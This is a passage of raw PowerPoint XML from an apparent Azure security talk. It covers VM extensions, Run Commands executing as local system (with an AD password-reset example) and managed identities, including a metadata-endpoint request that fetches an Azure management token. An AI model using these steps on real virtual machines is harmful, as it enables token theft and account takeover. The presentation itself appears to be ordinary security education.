              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>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srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>--resource-group</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>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srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>myResourceGroup</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>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srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>myVM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>--name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>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srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DependencyAgentLinux</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>--publisher</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft.Azure.Monitoring.DependencyAgent</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> \ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>--version</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 9.5 \ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="006881"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>enable-auto-upgrade</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="07704A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>true</a:t>
            </a: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4893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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2712787" y="254860"/>
            <a:ext cx="955165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4000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Extensions and Run Commands </a:t>
            </a:r>
            <a:endPar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Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC413AF-CB46-41C3-A839-24555265043F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634663" y="1072540"/>
            <a:ext cx="4864894" cy="5010760"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Runs also as context of local system account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>No way to remove the features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Only permission needed is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Microsoft.Compute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>virtualMachines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>runCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accessible by Virtual Machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contributer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="171717"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Requires Public IP access to Azure from VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Managed Run Commands in Preview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Parallel execution of multiple scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Support for long running scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B463BA69-25B2-43BF-9723-1F00E06BC2D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6017774" y="1054100"/>
            <a:ext cx="4552272" cy="3302000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB2B55C8-9723-4E3D-9A46-E314768B5238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5936428" y="4244244"/>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02124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Example: </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Set-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ADAccountPassword</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-Identity user03 -</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NewPassword</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srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NewPwd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Reset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DDF9A346-D0C2-4BD9-8BD2-25CC8C3459FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5909064" y="4923122"/>
            <a:ext cx="6094902"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Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Log path: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>C:\WindowsAzure\Logs\Plugins\Microsoft.CPlat.Core.RunCommandWindows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3203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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805782" y="357127"/>
            <a:ext cx="955165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4000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Managed Identities</a:t>
            </a:r>
            <a:endPar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Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC413AF-CB46-41C3-A839-24555265043F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634663" y="1072540"/>
            <a:ext cx="4102437" cy="5010760"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Provides VMs with their own Azure AD Identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Lives and dies with the VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Commonly used for authentication to other Azure Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Kubernetes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What kind of permissions does the managed identities actually have?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="171717"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>GET:  'http://169.254.169.254/metadata/identity/oauth2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>token?api-version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>=2018-02-01&amp;resource=https://management.azure.com/' HTTP/1.1 Metadata: true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB2B55C8-9723-4E3D-9A46-E314768B5238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5854846" y="972779"/>
            <a:ext cx="6096000" cy="5047536"/>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202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Example: Azure Resource Graph: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>// SAMI = System-assigned Managed Identity</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
